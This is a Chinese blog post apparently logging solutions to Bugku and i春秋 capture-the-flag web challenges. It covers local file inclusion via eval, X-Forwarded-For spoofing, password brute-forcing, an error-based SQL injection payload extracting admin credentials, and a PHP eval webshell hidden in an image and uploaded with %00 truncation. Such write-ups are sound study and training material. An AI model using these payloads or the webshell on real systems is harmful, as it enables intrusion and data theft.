• 第八周


    web题:

    1.bugku本地包含

    打开是一段高亮的php代码,查看源码和抓包都没有什么有用的信息,解题的关键就在于代码段中

    读一下这段代码,大概意思是:

    包含flag,php文件,变量a等于由REQUEST请求中传入的hello值(REQUEST传入是包含GETPOST两种传入方式,所以我们直接构造url就可以传入hello的值了),第三排代码的意思是将”var_dump($a);”当做php代码来计算,var_dump(的意思又是显示$a的信息),最后一段是高亮代码,所以在这里我们只需要通过$a的值来读取flag文件

    构造url123.206.87.240:8003?hello=file(“flag.php”)

    2.bugku变量1

    打开题目是一段高亮的php代码和一句提示,告诉我们flag在变量中

    然后阅读代码,大意是:

    返回等级为0的错误报告,也就是关闭报错,不给我们报错注入的机会,包含flag.php,高亮文件,如果存在GET传入的args值则让变量args等于其,如果args中不存在字母或则数字则会报args error!(存在标点符号也会报错)然后如果存在则进行返回args的值的信息,所以这里应该是要我们猜中变量的值,然后就会给我们flag,这里我们就懒得猜了,直接全局变量GLOBLAS,(让其依次尝试所有的变量)

    构造urlhttp://123.206.87.240:8004/index1.php?args=GLOBALS

    3.bugku web5

    打开题目提示JSPFUCK格式是。。。。。

    话不多说直接查看源码

    发现了一段神秘代码,这东西我见过,不过一时想不起来,就粘到百度上试试,搜出来类似的,提示的是JSFUCK代码,然后就试试我之前博客中关于JSFUCK代码运行的方法

    复制

    打开firefox浏览器

    按下F12

    选择上方的控制台

    在下方粘贴是jsfuck代码

    按下回车即可运行

     

    果真得到了flag

    4.bugku 头等舱

    打开他说什么都没有,一看还真没有,查看源码也什么都没有,

    抓包试试,直接传repeatergo一遍

    得到flag,原来头等舱的英文简写hd也是头的简写,也就是头文件信息

    5.bugku 网站被黑

    打开题目是一个动态的黑页, 提示说实战中经常会遇到,我们抓包,看源码,都没有什么线索,联系实战,我们先扫扫后台

    果真扫出来了,打开试试

    发现一个登录网页

    没有验证码和用户名就单纯的密码,所以我们试试爆破

    直接bp抓包用自带密码字典开爆

    就爆出来最后的密码为hack,登录试试,给出了flag

    6.bugku 管理员系统

    打开是一个很简单的登录表单填写,查看源码抓包都没什么,试试admin等弱口令账号密码发现会提示我们ip禁止访问。。。

    我们用bp抓包再构造ip试试

    添加X-Forwarded-For:1.1.1.1

    发现ip禁止的提示没了,并在最下面找到了一个绿色提示

    可能是flag,试了试不对,再就可能是加密了的东西

    复制到bpdecode中解密试试

    发现是base64加密的,解出来是test123,估计这就是密码了

    然后去尝试admintest123的各种组合,最后发现账号是admin,密码是test123,然后ip设置成127.0.0.1(必须是本地的ip,我刚开始一直尝试其他的ip就失败了,看了别人的IP才发现了是ip没设置对)

    然后得到flag

    1.渗透测试 i春秋你是会员吗

     

    打开先让我们找管理员密码

    Emmmm,这还不简单,思路就是先扫后台然后爆破,账号可能就是admin,因为这里只让我们找密码不是?结果发现不行。。。。

    还是根据dalao们的操作走吧

    先打开网页的注册页面

    然后填入信息,设置代理,抓包

    username后面进行注入

    ‘UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 FROM (SELECT count(1),councat(round(rand(0)),(SELECT concat(username,0x23,password) FROM c_admin LIMIT 0,1))a FROM information_schema.tables GROUP BY a)b#

     

    得到一串报错,这就是通过注入得到的密码了,不过是加密的

    Md5解密试试

    成功得到密码

    通过sql注入也可以获取加密的用户名,解出来是xdcms121

    然后我们就找后台吧

    直接上御剑,自带字典一扫就出来了

     

    成功进入了

    找来找去这里只发现了一个图片上传,于是这里就试试用图片上传一句话木马

    具体方法如下:

    找一个图片(电脑共享文件的图片中随机一张就行)

    新建一个txt文档,写入一句话木马(文档顶格写入一个回车来空行)

    <?php @eval($_POST['ichunqiu']);?>

    再用cmd指令来合并两个文件Copy Sunset.jpg/b + 1.txt/a 2.jpg /y(两个文件得在同一个文件,我就直接放桌面了)

    打开合成好的文件,拉到最下面就发现了我们写入的一句话木马

    再在幻灯片的窗口上传我们的木马图片

    在管理幻灯中随便找个修改然后图片上传成我们的

    复制图片路径然后点保存

    然后打开菜刀,尝试输入错误的地址看报错

     

    发现会自动给我们加个index.php

    所以我们就在地址后加入%00来截断

    然后就成功进入了

    找到flag

     

  • 相关阅读:
    进程管理
    磁盘管理
    用户组管理
    Idea 导入(import)项目和打开(open)项目的区别
    SqlServer--转换varchr值‘2993296307’时溢出了整数列 和 修改 字段类型
    C#--Winform--图标控件Chart详解
    SqlServer--存储过程--自定义存储过程
    SqlServer--存储过程--系统和扩展存储过程(不常用)
    SqlServer--视图
    C#--SqlServer--sql语句拼接和带参数的SQL语句
  • 原文地址:https://www.cnblogs.com/wosun/p/11723727.html
Copyright © 2020-2023  润新知